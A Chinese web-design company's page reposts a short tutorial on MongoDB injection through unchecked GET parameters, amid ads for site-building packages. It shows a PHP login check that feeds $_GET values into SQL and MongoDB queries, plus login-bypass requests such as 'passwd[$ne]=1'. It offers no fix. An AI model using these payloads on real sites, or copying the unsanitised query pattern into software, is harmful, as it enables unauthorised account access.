网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

怎样利用GET参数判断不严格进行MongoDB注入-创新互联

本篇文章给大家分享的是有关怎样利用GET参数判断不严格进行MongoDB注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

创新互联公司主要从事成都网站制作、成都做网站、外贸营销网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务曲水,十年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:13518219792

在关系型数据库时代,SQL注入攻防几乎成了每一个Web开发者的必修课,很多NoSQL的支持者称NoSQL的同时也就NoSQL注入了。

怎样利用GET参数判断不严格进行MongoDB注入

使用SQL数据库存储用户名密码的系统,我们检测用户名与密码的过程可能是这样的:

mysql_query("SELECT*FROMuser

WHEREusername=".$_GET['username'].",

ANDpasswd=".$_GET['passwd'])

我们使用MongoDB进行最简单的用户名与密码检测可能是这样的:

$collection->find(array(

"username"=>$_GET['username'],

"passwd"=>$_GET['passwd']

));

怎样利用GET参数判断不严格进行MongoDB注入

在最普通的SQL注入中,我们可以构造下面这样的请求:

login.php?username=admin&passwd=abcOR1–

这个请求会形成这样的SQL语句:

SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;

成功注入!

采用同理的方法,针对上面的MongoDB查询方式,你可以构造下面的请求:

login.php?username=admin&passwd[$ne]=1

这个请求会形成这样的MongoDB查询:

$collection->find(array(

"username"=>"admin",

"passwd"=>array("$ne"=>1)

));

成功注入!

以上就是怎样利用GET参数判断不严格进行MongoDB注入,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。


本文题目:怎样利用GET参数判断不严格进行MongoDB注入-创新互联
转载源于:http://bjjierui.cn/article/dhhccs.html

其他资讯